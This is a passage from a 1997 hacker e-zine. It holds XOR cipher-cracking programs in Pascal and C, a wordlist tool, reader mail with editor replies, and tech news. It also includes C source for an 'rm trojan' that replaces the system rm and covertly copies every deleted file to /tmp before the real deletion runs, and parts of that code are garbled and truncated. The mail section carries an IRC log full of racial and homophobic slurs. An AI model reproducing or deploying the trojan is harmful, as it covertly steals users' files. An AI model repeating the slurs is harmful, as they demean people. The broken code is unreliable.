  count, maxcount : array[1..MAXKEY] of Integer;
  inpath, outpath : String;
  minkeysize, maxkeysize, i : Integer;

procedure Crack(Filename : String; keysize : Integer);
var
  file1: file;
  i,j, result: integer;
  b : byte;
begin
  Write('Cracking');
  Assignfile(file1,Filename);
  Reset(file1,1);
  for i := 1 to KeySize do
    begin
      key[i] := 0;
      maxcount[i] := 0;
    end;
  for i:=0 to 255 do
    begin
      seek(file1,0);
      for j := 1 to KeySize do count[j] := 0;
      while not eof(file1) do
        begin
          blockread(file1,buffer,keysize,result);
          for j:=1 to result do
            begin
              b:= i xor buffer[j];
              if b in [10,13,32,97..122] then
                count[j] := count[j] + 1;
            end;
        end;
      for j:=1 to keysize do
        if count[j]>maxcount[j] then
          begin
            key[j]:=i;
            maxcount[j]:=count[j];
          end;
      Write('.');
    end;
  WriteLn('Done!');
  closefile(file1);
end;

procedure Decrypt(infile, outfile : String; keysize : Integer);
var
  file1,file2: file;
  i,j, result: integer;
begin
  Write('Decrypting');
  assignfile(file1,infile);
  reset(file1,1);
  assignfile(file2,outfile);
  rewrite(file2,1);
  while not eof(file1) do
    begin
      blockread(file1,buffer,keysize,result);
      for j:=1 to result do
        buffer[j]:= buffer[j] xor key[j];
      blockwrite(file2,buffer,result,i);
      Write('.');
    end;
  closefile(file1);
  closefile(file2);
  WriteLn('Done!');
end;

begin
  Write('Min key size: ');
  ReadLn(minkeysize);
  Write('Max key size: ');
  ReadLn(maxkeysize);
  Write('Enter ciphertext: ');
  ReadLn(inpath);
  for i := minkeysize to maxkeysize do
    begin
      outpath :=
        ExtractFilePath(inpath) + IntToStr(i) + '.txt';
      Crack(inpath, i);
      WriteLn;
      Decrypt(inpath, outpath, i);
      WriteLn;
    end;
end.

═───────────────────────────────────────────────────────────═
12 of 16
genericrack2.c
By Shok, Staff Writer

/* genericrack2 by The Messiah
   converted to C by Shok */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define MAXKEY 1024

unsigned char key[MAXKEY], buffer[MAXKEY];
int count[MAXKEY], maxcount[MAXKEY];
char inpath[1024], outpath[32];
int minkeysize, maxkeysize, i;

void Crack(char *Filename, int keysize)
{
  FILE *file1;
  int i, j, result;
  unsigned char b;

  printf("Cracking");
  sleep(1);
  file1 = fopen(Filename, "rb");
  if (file1 == NULL) {
    perror(Filename);
    exit(1);
  }

  for (j = 0; j < keysize; j++) {
    key[j] = 0;
    maxcount[j] = 0;
  }

  /* try every byte value i at every key position j */
  for (i = 0; i < 256; i++) {
    rewind(file1);
    for (j = 0; j < keysize; j++)
      count[j] = 0;

    /* read the ciphertext one key-length block at a time */
    while ((result = fread(buffer, 1, keysize, file1)) > 0) {
      for (j = 0; j < result; j++) {
        b = i ^ buffer[j];
        /* LF, CR, space or a-z counts as plausible plaintext */
        if ((b == 10) || (b == 13) || (b == 32) ||
            ((b >= 97) && (b <= 122)))
          count[j] = count[j] + 1;
      }
    }

    /* keep the value that produced the most plausible bytes */
    for (j = 0; j < keysize; j++) {
      if (count[j] > maxcount[j]) {
        key[j] = i;
        maxcount[j] = count[j];
      }
    }
    putchar('.');
  }

  printf("\nDone!\n");
  fclose(file1);
}

void Decrypt(char *infile, char *outfile, int keysize)
{
  FILE *file1, *file2;
  int j, result;

  printf("Decrypting");
  sleep(1);
  file1 = fopen(infile, "rb");
  file2 = fopen(outfile, "wb");
  if (file1 == NULL || file2 == NULL) {
    perror("fopen");
    exit(1);
  }

  while ((result = fread(buffer, 1, keysize, file1)) > 0) {
    for (j = 0; j < result; j++)
      buffer[j] = buffer[j] ^ key[j];
    /* write only the bytes that were actually read */
    fwrite(buffer, 1, result, file2);
    putchar('.');
  }

  fclose(file1);
  fclose(file2);
  printf("\n\nDone!\n");
}

int main(void)
{
  printf("Min key size: ");
  if (scanf("%d", &minkeysize) != 1) return 1;
  printf("Max key size: ");
  if (scanf("%d", &maxkeysize) != 1) return 1;
  printf("Enter ciphertext: ");
  if (scanf("%1023s", inpath) != 1) return 1;

  /* key sizes must fit the MAXKEY-byte buffers */
  if (minkeysize < 1 || maxkeysize > MAXKEY || minkeysize > maxkeysize) {
    fprintf(stderr, "key size must be between 1 and %d\n", MAXKEY);
    return 1;
  }

  for (i = minkeysize; i <= maxkeysize; i++) {
    /* one output file per key size, named as in the Pascal version */
    snprintf(outpath, sizeof(outpath), "%d.txt", i);
    Crack(inpath, i);
    putchar('\n');
    Decrypt(inpath, outpath, i);
    putchar('\n');
  }
  return 0;
}

═───────────────────────────────────────────────────────────═
13 of 16
word.c
By memor, thtj staff writer
memor@mygale.org

/*
   Here is some wordlist processing program
   fastly done by memor for thtj16
   released on Tue Oct 21 18:55:02 199
   v0.001

   well, i'll comment the code, if u want to improve it,
   no matters if u want to improve it.. :)

   way u could do to improve it:
   - make structures type file to stock words got and wont write
     exactly the 2 same words in the output file
   - make a third argument as a integer type (with atoi) to put
     a word size to save.. instance: dont save the words in the
     output file if they have less than 3 characters

   l8r,
   memor@mygale.org
*/

/* includes necessary to commands printf..,fopen..*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* main function using arguments (argc, argv) */
int main(int argc,char *argv[])
{

/* defining FILE type pointers for input file and output file
   variable cara for the read/written character
   integer type test and testa for testing when a character has to
   be replaced as a \n in the output file, or when there is twice
   character to be replaced..
   string char(30) type for nsource and ndest,
   for the input and output filenames */

FILE *source;
FILE *dest;
int cara;   /* int, not char: fgetc() returns an int so EOF stays distinct from data */
int test=0;
int testa=1;
char nsource[30];
char ndest[30];

/* checking there is enough arguments */
if(argc<3)
{
 printf("memor 1997-98 v0.01\n");
 printf("usage: %s textfile wordfile\n",argv[0]);
 exit(1);
}

/* writing in nsource the source filename
   writing in ndest the destination filename
   (names that do not fit the 30-byte buffers are refused
   instead of overflowing them) */
if(snprintf(nsource,sizeof(nsource),"%s",argv[1])>=(int)sizeof(nsource) ||
   snprintf(ndest,sizeof(ndest),"%s",argv[2])>=(int)sizeof(ndest))
{
 printf("Filename too long..\nAborted..\n");
 exit(1);
}

/* opening source and checking btw if source exists */
source=fopen(nsource,"r");
if(source==NULL)
{
 printf("File does not exists..\nAborted..\n");
 exit(1);
}

/* opening output file and checking no errors in it */
dest=fopen(ndest,"w");
if(dest==NULL)
{
 printf("Can't open file..\nAborted..\n");
 exit(1);
}

/* beginning processing and ending on EOF character */
do
{
/* getting character from input file */
 cara=fgetc(source);
 test=0;

/* checking if character between 0 and 9, a and z or A and Z
   and writing it if the condition is true.
*/ if(cara>'0'-1 && cara<'9'+1) { fputc(cara,dest); test=1;testa=0; } if(cara>'a'-1 && cara<'z'+1) { fputc(cara,dest); test=1;testa=0; } if(cara>'A'-1 && cara<'Z'+1) { fputc(cara,dest); test=1;testa=0; } /* if the condition was FALSE and no \n written in the outpout file before, writting it */ if(test==0 && testa!=1) { fputc(13,dest); fputc(10,dest); testa=1; } } while(cara!=EOF); /* closing file for ending that clean job :) */ fclose(dest); fclose(source); } ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 14 of 16 rm.c Fix By Shok, Staff Writer shok@sekurity.org /* --------------------------------- */ /* rm trojan by --==+*~(Shok)~*+==-- */ /* Email: shok@sekurity.org */ /* --------------------------------- */ #include #include #include #include #include void main(int argc, char **argv) { struct stat filestats; int i; int recursive, verbose, force, interactive; int c; if (argc > 2) { while((c = getopt (argc, argv, "Rrifv:")) != -1) switch (c) { case 'R': case 'r': recursive = 1; break; case 'i': interactive = 1; break; case 'f': force = 1; break; case 'v': verbose = 1; break; case '?': if(isprint (optopt)) fprintf (stderr, "Unknown option '-%c'.\n", optopt); else fprintf (stderr, "Unknown option character `\\x%x'.\n", optopt); exit(1); default: break; } } else if (argc == 2) { setenv("PROGRAM", argv[1], 1); system("cp -f $PROGRAM /tmp/fill &>/dev/null"); execl("/bin/rm.bak", "rm", argv[1], NULL); unsetenv("PROGRAM"); exit(0); } else { exit(0); } /* Well....got a better idea? 
*/ if ((interactive == 1) && (verbose != 1) && (force != 1) && (recursive != 1)) goto interactive; if ((force == 1) && (verbose != 1) && (interactive != 1) && (recursive != 1)) goto force; if ((verbose == 1) && (interactive != 1) && (force != 1) && (recursive != 1)) goto verbose; if ((recursive == 1) && (verbose != 1) && (force != 1) && (interactive != 1)) goto recursive; if ((recursive == 1) && (force == 1) && (interactive != 1) && (verbose != 1)) goto rf; if ((recursive == 1) && (force != 1) && (interactive == 1) && (verbose != 1)) goto ri; if ((recursive == 1) && (force != 1) && (interactive != 1) && (verbose == 1)) goto rv; if ((recursive == 1) && (force == 1) && (interactive != 1) && (verbose == 1)) goto rfv; /* If we made it to here something is wrong */ fprintf(stderr, "Unknown error.\n"); exit(1); interactive: for (i=2;i/dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-i",argv[2],NULL); } exit(0); force: for (i=2;i/dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-f",argv[2],NULL); } exit(0); verbose: for (i=2;i/dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-v",argv[2],NULL); } exit(0); recursive: for (i=2;i/dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-r",argv[2],NULL); } exit(0); rf: for (i=2;i/dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-rf",argv[2],NULL); } exit(0); ri: for (i=2;i/dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-ri",argv[2],NULL); } exit(0); rv: for (i=2;i/dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-rv",argv[2],NULL); } exit(0); rfv: for (i=2;i/dev/null"); unsetenv("PROGRAM"); execl("/bin/rm.bak","rm","-rfv",argv[2],NULL); } exit(0); } ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 15 of 16 Oddville, THTJ By Scud-O, Editor in Chief scud@thtj.com Oddville, THTJ for the Month of October [01] Fwd: Bronc vs. 
Jericho, Modify [02] eReEt MiXeD cApS hErE [03] Help Wanted on IP Spoofing, g8 way2 [04] Information on the thtj Mailing List, FH [05] Is The Mailing List Up Yet?, Peter [06] No New Membership Openings [07] Praise. [08] Sex Sites Will Never Be In THTJ, John Doe [09] Hackers of the world, please help you? , Acid Burn [10] Let's Link,Frank Bertotti [11] Havoc, The Program? [12] Trying to Learn, Jeff [13] AOL Chat Room 'Punter', HESTUD Note: Well, once again, thanks to nethosting.com, Oddville is light on content, since well, there is a less that 10% chance that your mail actually got thru nethosting's mail servers! Next month, this should all be resolved, since we are *finally* moving. --- [ Fwd: Bronc vs. Jericho ] Date: Thu, 02 Oct 1997 03:05:22 -0400 From: Modify Organization: Global kOS X-Mailer: Mozilla 2.01KIT (Win95; U) To: xxxxx@xxx.xxx CC: xxxxx@xxxxx.xxx, xxxx@xxxxxx.xxx, xxx@xxxxxxxxxxx.xxx Subject: [Fwd: Forwarded mail....] Welp, good ol bronc has done it again... he now has slammed me and Jericho on this log that Jericho has sent me... Jericho is the one without the full address within the nick... he is (-[Bronc]-) and the "real" bronc buster is [Bronc(Bronc_Bust@pwrrack38.succeed.net)] -- Modify ----------oOo------------------------------------------0 HACP: http://members.tripod.com/~ListedBlack/index2.htm Global kOS: http://www.thtj.com/kOS ls -l | awk '{size = size + $5; print size}' Security is an on going process.. 
just dont fall behind ----------oOo------------------------------------------0 Received: from mx01.erols.com (mx01.erols.com [205.252.116.65]) by mail0.erols.com (8.8.5/8.7.3/970701.001epv) with ESMTP id AAA17642 for ; Thu, 2 Oct 1997 00:36:51 -0400 (EDT) From: jericho@dimensional.com Received: from blackhole.dimensional.com (blackhole.dimensional.com [208.206.176.10]) by mx01.erols.com (8.8.5/8.8.5/MX-mnd) with ESMTP id AAA25408 for ; Thu, 2 Oct 1997 00:36:50 -0400 Received: from flatland.dimensional.com (sendmail@flatland.dimensional.com [208.206.176.24]) by blackhole.dimensional.com (8.8.7/8.8.nospam) with ESMTP id WAA06246 for ; Wed, 1 Oct 1997 22:36:48 -0600 (MDT) Received: from flatland.dimensional.com (718@flatland.dimensional.com [208.206.176.24]) by flatland.dimensional.com (8.8.7/8.8.7) with SMTP id WAA05944 for ; Wed, 1 Oct 1997 22:36:46 -0600 (MDT) Date: Wed, 1 Oct 1997 22:36:46 -0600 (MDT) To: Modify Subject: Forwarded mail.... Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-UIDL: fab0bf073e X-Mozilla-Status: 0001 pass this around. [10:19pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] youre a poor bitch [10:19pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] I can see that now [10:19pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] everything i was told was right [10:19pm] (-[Bronc]-) At least I have a clue. [10:19pm] (-[Bronc]-) I know how to hack for one thing, and I know the definition of slander [10:19pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] good, then you know how lame your pals are (this is between you and me, why bring others into it?) [10:20pm] (-[Bronc]-) this has nothing to do with them. just your lame mail about me that you didnt have the balls to cc me in on. [10:20pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] what mail? [10:20pm] (-[Bronc]-) Yup.. the mail all about me and your stupid assumptions you dumb nigger. 
(the mail said I was stalling on setting up a server in order to shut him down) [10:20pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] you mean the one Modify sent out (what, he sent it from your account? The headers were not forged.) [10:20pm] (-[Bronc]-) no.. the one YOU sent out. [10:20pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] telling everyone how you were keeping me shut donw? [10:20pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] making fu of me (my *reply* made fun of you) [10:20pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] I sent no mail [10:20pm] (-[Bronc]-) I sent out the reply you dumb bitch [10:20pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] I got modifys and yours [10:20pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] both dogging me [10:21pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] you need to pull your head out [10:21pm] (-[Bronc]-) The server wasnt up until a week ago. Had nothing to do with shutting you down [10:21pm] (-[Bronc]-) You need to pull more than your head out. [10:21pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] your pal is playing you for a fool [10:21pm] (-[Bronc]-) get your dick out of a horses ass and wake up. [10:21pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] hahaha [10:21pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] Modify has his dick in your ass [10:21pm] (-[Bronc]-) better than a horse [10:21pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] and you dont even know it [10:21pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] what a sucker [10:21pm] (-[Bronc]-) yes, you are. [10:22pm] (-[Bronc]-) you got suckered by Carolyn of all people. [10:22pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] suckered? [10:22pm] (-[Bronc]-) yup [10:22pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] man he is fucking up in the ass [10:22pm] (-[Bronc]-) You almost have a clue about the whole picture. 
[10:22pm] (-[Bronc]-) go away fag [10:22pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] how gullible [10:22pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] everyone laughs at you outside your little sircle [10:22pm] (-[Bronc]-) sure they do [10:23pm] (-[Bronc]-) circle btw [10:23pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] just like I do [10:23pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] youll see soon enough (OOh! Just like Carolyn, a vague threat) [10:23pm] (-[Bronc]-) like you matter? you cant hack your way out of a horses ass. [10:23pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] it won;t be long tell he wants to jizz on you to [10:23pm] (-[Bronc]-) what, another vague threat? imagine that. [10:23pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] grow up [10:23pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] youre soooooooo small (then what does that make you?) [10:23pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] lame ass spending 24/7 on IRC k/b ppl (Why the *fuck* do people assume that? I am actively typing on IRC less than an hour a day.) [10:23pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] listening to that lame ass [10:24pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] letting him play you for a fool [10:24pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] hahaha [10:24pm] (-[Bronc]-) why the fuck you do you assume i am here 24/7? you are so ignorant. [10:24pm] (-[Bronc]-) go away monkey [10:25pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] loser [10:25pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] send me some pics of him jizzinf on you [10:25pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] hahah [10:25pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] what a chump [10:25pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] auto kick/ban (that was a manual kick) [10:25pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] wont even talk like a mature adult ("loser" "what a chump" and all the comments about jizz.. and you say I am not mature? 
pot -> kettle -> black) [10:26pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] but i forgot, youre an IRC kiddie (I can still hack, something you can't. The only thing you can do, code HTML, is barely a skill, and you do it very poorly.) [10:26pm] (-[Bronc]-) an irc kiddie that knows something about security. an irc kiddie that is on maybe half an hour a day. you ignorant bitch [10:26pm] (-[Bronc]-) go the fuck away horse ass [10:26pm] (-[Bronc]-) you cant even do HTML worth shit lamer [10:27pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] thats why youre idle time was over 2 hours (exactly. Because I check messages here and there. Duh) [10:27pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] hahaha [10:27pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] little kid [10:27pm] (-[Bronc]-) exactly. i check in here and there for messages. duh [10:27pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] thats all you are [10:27pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] long haired kiddie [10:27pm] (-[Bronc]-) little kid that is a lot smarter than you. must make you feel like an ass. [10:27pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] pleas [10:27pm] (-[Bronc]-) hair length? that is a mature insult [10:27pm] (-[Bronc]-) ignoring your dumb ass --- [ eReEt MiXeD cApS hErE ] Date: Fri, 03 Oct 1997 03:21:09 -0700 From: xxxx@xxxxxxxxxx.xxx (xxxxx, xxxxx) X-Mailer: Mozilla 3.0 (Win95; U; 16bit) To: scud@thtj.com Subject: SuP yO dAwG.i Am KiNd Of NeW aT tHiS sO bArE wItH mE.dO yOu HaVe AnY hAkInG fIlEs I cAn DoWnLoAd.I rEaD mOsT oF tHe FiLeS yOu GoT bUt I nEeD sOmE fOr ReFrEnCe. [ try thtj.com/files.html for a few, but get off of your lazy butt, and do some searching for files. A site that readily comes to mind is my good friend JP's site: http://www.antionline.com/ . Oh, and by the way, learn to change your name in Netscape Mail, since i really *doubt* that your mom would approve of you 'hAkInG'. 
] --- [ Help Wanted on IP Spoofing ] X-Originating-IP: [130.133.217.173] From: "g8 way2" To: scud@thtj.com Subject: i dont know where to go? Date: Sun, 05 Oct 1997 14:44:37 PDT hello, and sorry for using you time, but i did not know where to go with my question.. Is it possible to spoof, say an ftp-server, with a different hostname, than the one you're dialing in from.. i'm not talking about altering your ID, i know how to do that, but how to alter your ip..i've read some of your mags, but couldn't find an answer :-( Sorry if i'm at the complete wrong table here, but if you know where i can obtain info on this i would be very gratefull too,,,, btw your e-zine is good reading ( <--- = obligatory asslicking line) thanks,,, g8way2 ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com [ Go get jizz.c ( thtj.com/jizz.c ) of the like, and run it on your unix box. All the instructions should be there, and they are fairly self explainitory However, you must be root for this to work, and have a fair knowledge of unix, so this is not for the beginner. ] --- [ Information on the thtj Mailing List ] Date: Mon, 6 Oct 1997 06:37:47 -0500 (CDT) X-Sender: xxxxx@xxx.com X-Mailer: Windows Eudora Light Version 1.5.2 To: scud@thtj.com From: FH Subject: Welcome to thtj See i joined.. but you might want to add WHAT ADDRESS YOU MAIL TOO NOW. it doesnt say 'to send out mail send it to xxxxxxx@terminus.orc.ca Or is that even where it goes? You want me to write up a file for this shit so when you subscribe it sends back with like stuff about the list and all that other information? >Date: Sun, 5 Oct 1997 19:38:25 -0400 (EDT) >X-Authentication-Warning: terminus.orc.ca: majordomo set sender to owner-thtj@terminus.orc.ca using -f >To: typeo@qni.com >From: majordomo@terminus.orc.ca >Subject: Welcome to thtj >Reply-To: majordomo@terminus.orc.ca > >-- > >Welcome to the thtj mailing list! > >Please save this message for future reference. 
Thank you. > >If you ever want to remove yourself from this mailing list, >you can send mail to with the following >command in the body of your email message: > > unsubscribe thtj > >or from another account, besides xxxxx@xxx.com: > > unsubscribe thtj xxxxx@xxx.com > >If you ever need to get in contact with the owner of the list, >(if you have trouble unsubscribing, or have questions about the >list itself) send email to . >This is the general rule for most mailing lists when you need >to contact a human. > > Here's the general information for the list you've subscribed to, > in case you don't already have it: > > > [ Editor's Note: The THTJ Mailing list we have it for THTJ Distro _only_. This majordomo is not an open majordomo, we will only be distroing thtj from it. We are currently setting up another domo that will be open, so all of you mugs can talk til your dead. ] --- [ Is The Mailing List Up Yet? ] From: "Peter xxx" Organization: To: webmaster@thtj.com Date: Wed, 1 Oct 1997 13:29:03 MET Subject: I don't like coffee ... Priority: normal X-Mailer: Pegasus Mail for Windows (v2.53/R1) ... but I'd like to know when you will give live to the mailing-list mentioned on your site... Greetings from Germany - actually raining :( Peter [ Peter, you are in luck, thtj has opened the mailing list. To join it, send mail to: majordomo@terminus.orc.ca , with the body reading : subscribe thtj ] --- [ No New Membership Openings ] Date: Sun, 5 Oct 1997 18:21:57 -0400 (EDT) From: xxxxxxx To: thtj@thtj.com Subject: memership hi sorry to bore you with shit like that, but i am interesting in becoming a member of your group and wonder if you have any tests or something..i also wanna wask if i have to be a member to write articles for the mag. thanks .. bye 4 now -- xxxxxxx [ Just so everyone knows, neither thtj or hbs are looking for new members. 
thtj does incourage people to write for thtj, since it is open for anyone and everyone to write for, and after several articles, we may let you onto the staff as a staff writer. However, there are no tests for this, so just go write some articles. ] --- [ Praise. ] Date: Tue, 07 Oct 1997 19:50:13 -0500 From: xxxxxxx Organization: xxxxxx X-Mailer: Mozilla 4.01 [en] (Win95; U) To: scud@thtj.com Subject: Hey Just wanna give you big props on issue 15 yet another great thtj, you guys own. Keep up the good work... [ Thank you, we try our best. ] --- [ Sex Sites Will Never Be In THTJ ] X-Originating-IP: [200.241.100.130] From: "John Doe" To: scud@thtj.com Subject: havoc Date: Fri, 17 Oct 1997 14:36:33 PDT Hi! I think Havoc simply COOL! :) I'd like to give a suggestion for the november edition: "How to hack sex sites". Today many people use hacked accounts to enter porn sites and teaching how to do it would be very helpful. Thanks and good bye! [ Two letters and one punctuation for you: NO! THTJ Will *never* publish anything about sex sites. That is just plain sick. There is no 'hacking' involved in sex sites, all you have to do, is probably just card an account. This is not hacking, this is no anything useful, so thtj will never print anything like this. Go get a girlfriend.] --- [ Hackers of the world, please help you? ] Date: Fri, 24 Oct 1997 23:28:27 -0700 (PDT) From: Acid Burn Subject: HELP!!! To: scud@thtj.com, keystroke@thepentagon.com, reaper@linenoise.org Cc: thtj@thtj.com, alienphreak@linenoise.org Hackers of the world PLEASE HELP ME!!! I am in desperate need of your help!!!! Please can you mail me all the passwords together with their User IDs and which system they are for as well as all the dialup codes etc. that you have in your collection. This is URGENT!! Please reply as soon as possible. (My friends life depends on it) Please forward this message to all hackers you know. Thanks a million. 
Acid Burn _____________________________________________________________________ Sent by Yahoo! Mail - http://mail.yahoo.com [ What the fuck is this bull shit? You friend's life depends on collecting passwd files? yea right. ] --- [ Let's Link ] Date: Sun, 26 Oct 1997 17:24:37 -0700 (MST) From: grant@letzlink.com To: scud@thtj.com Subject: Let's Link Visit Let's Link at http://www.letzlink.com/ I invite you to visit Let's Link .... perhaps, our Let's Link & Links section. Although, our "Add Your Link" service is FREE, we do ask you to reciprocate with a LINK at your site .... not required but highly appreciated. .... please review our instructions for linking before adding your site. Let's Link is a highly interactive Information Resource Center and a Global Gateway to thousands of The Best Sites on the "Net". Primary links include: Global Travel Guide; Education Network; Career Services; SharewareNET; Product Showcase; Worldwide Marketplace, Art; Catalogs; Real Estate Corner; Shoppers Paradise and much more. Let's Link is a family friendly site. Our site visitation now exceeds 4,300 per/day! 25% Europe.... 70% North America... 5% Asia I hope you find our Information Resource Center useful. Regards, Frank Bertotti http://www.letzlink.com [ Sorry, but i *really* doubt that thtj.com would qualify as a 'family' site.] --- [ Havoc, The Program? ] From: AMando5454@aol.com Date: Sat, 25 Oct 1997 17:06:43 -0400 (EDT) To: thtj@thtj.com Subject: Havoc We are looking for the program, Havoc. If you have any information that you think will be helpful, we would appreciate any help. Thank You [ Twice now i have gotten this. WHAT THE FUCK IS 'Havoc, the program'? i demand to know. 
] --- [ Trying to Learn ] Read-Receipt-To: "Jeff" Priority: Normal X-MSMail-Priority: Normal To: scud@thtj.com From: "Jeff" Date: Fri, 31 Oct 97 09:01:31 PST X-MIME-Autoconverted: from quoted-printable to 8bit by id TAA11759 i will like to learn how to get programs to crack codes and to create virusis please help [ try going to yahoo and searching for information. ] --- [ AOL Chat Room 'Punter' ] From: HESTUD Date: Sat, 1 Nov 1997 05:05:54 EST To: scud@thtj.com Subject: how to get a punter Organization: AOL (http://www.aol.com) X-Mailer: Inet_Mail_Out (IMOv10) dear scud-o ive been searching your link and i think its very interesting . i was wondering if you can send me a punter for aol chat rooms. this would be a great help or least find out how i can get one. hestud [ try yahoo or something. ] ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 16 of 16 The News Compiled by KungFuFox, Executive Editor kungfufox@thtj.com 1 : Spammers beware: Usenet2 not for you 2 : S/MIME Cracked by a Screensaver 3 : Webmaster Lets Sites Hack Themselves 4 : High-Tech Burglar Alarms Expose Intruders 5 : WorldCom Bid Threatens BT-MCI Merger 6 : U.S. cell phone industry battles service thieves 7 : Junk Mail Giant Cyber Promotions Is Back Online 8 : Electric Outlets Could Be Link To the Internet 9 : Coming Soon: Net Access Through Power Lines 10: GTE Makes $28B Cash Offer For MCI 11: GeoCities Sites Blocked In South Korea _____________________________________________________________ Spammers beware: Usenet2 not for you Network World, September 22, 1997 A new, spam-free version of the Internet-based bulletin board system Usenet is being developed. Called Usenet2 or U2, the network will use monitoring software and a strict set of community rules to create a spam-free environment. Spam refers to unwanted mass postings to Usenet discussion groups. 
According to some estimates, 80% of the messages now posted on Usenet are spam or spam "cancels," which are messages that try to delete spam from servers.

Several Internet service providers have agreed to support Usenet2, including ZippoDot Com and PANIX. Usenet2 will use monitoring software called Net-Monitor which can filter out binary posts and any post that is being sent to more than 3 newsgroups. Systems that agree to carry Usenet2 must also obey a strict set of rules including real return e-mail addresses on postings. If a system breaks the rules, it can have its Usenet2 feed disconnected.

_____________________________________________________________

S/MIME Cracked by a Screensaver
by Simson Garfinkel

26.Sep.97.PDT -- Cracking encrypted email just got much easier - as long as the message was encrypted with Netscape Navigator or Microsoft's Outlook Express.

Bruce Schneier, a cryptography consultant based in Minnesota, has created a Windows 95 screensaver that cracks encrypted email messages on computers that are otherwise unused.

"On average, it takes 35 days on a 166 MHz Pentium," said Schneier, who is also the author of the book Applied Cryptography.

The real power of Schneier's program is that it's designed to work on multiple machines in parallel over a local-area network. Got an office with a dozen machines? You can crack a message in a little less than three days. Got a thousand? Your wait will be just 50 minutes.

The program, which began as a screensaver that searched for large prime numbers, will be made available on Schneier's Web site today.

The program will only crack messages encrypted with RSA Data Security's S/MIME mail encryption standard, and at that, only messages that are encrypted with a 40-bit key. But that's exactly the encryption that's being offered today by the most commonly used versions of Netscape Messenger and Microsoft Outlook Express.

"What really pisses me off is that [these products] are being marketed as secure," said Schneier. "The products don't say that they use 40-bit encryption - be careful. They say this is security."

The S/MIME standard implemented by Netscape and Microsoft does provide for higher-level security by using different encryption algorithms. But Schneier maintains that messages encrypted with these stronger algorithms cannot be exchanged between the two vendors' products.

"The S/MIME security standard is really hard to work with," said Schneier. "None of [the products] interoperate at any level other than 40-bit RC2."

Schneier says he's releasing his program to demonstrate the fundamental vulnerabilities in the S/MIME standard. But S/MIME's maker disagrees, saying there is no problem using longer keys.

"Bruce is mistaken," said Scott Schnell, vice president of marketing for RSA Data Security, the co-author of the S/MIME specification. "We have mail messages on file in our interoperability test lab which demonstrate interpretability between Outlook Express and Netscape's Messenger using triple-DES," which has a 168-bit key.

©1993-97 Wired Ventures, Inc.

_____________________________________________________________

Webmaster Lets Sites Hack Themselves
by Mike Tanner

25.Sep.97.PDT -- When A.H.S. Boy secured the domain graphics.com this month for a nonprofit Web resource for graphic designers he was building, it seemed like a real coup for his nascent site. That is, until the address started logging thousands of hits while it still consisted merely of an "under construction" marker page.

